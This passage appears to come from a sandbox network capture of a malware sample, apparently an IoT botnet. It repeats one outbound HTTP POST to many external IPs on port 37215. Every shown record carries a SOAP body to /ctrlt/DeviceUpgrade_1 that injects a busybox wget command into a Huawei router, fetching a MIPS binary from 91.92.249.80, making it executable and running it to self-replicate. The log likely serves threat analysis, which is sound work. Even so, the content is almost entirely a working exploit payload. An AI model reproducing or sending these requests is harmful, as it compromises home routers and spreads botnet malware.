                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          279192.168.2.2341750157.141.7.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175951958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          280192.168.2.2335030157.205.167.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175956964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          281192.168.2.2352884157.195.95.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175975084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          282192.168.2.2353388197.46.27.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175980091 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          283192.168.2.235136664.88.186.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175990105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          284192.168.2.2343388134.72.110.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176000118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          285192.168.2.2352654157.50.166.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176018000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          286192.168.2.2339920157.138.74.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176027060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          287192.168.2.235103241.229.193.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176038027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          288192.168.2.2350076197.24.246.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176397085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
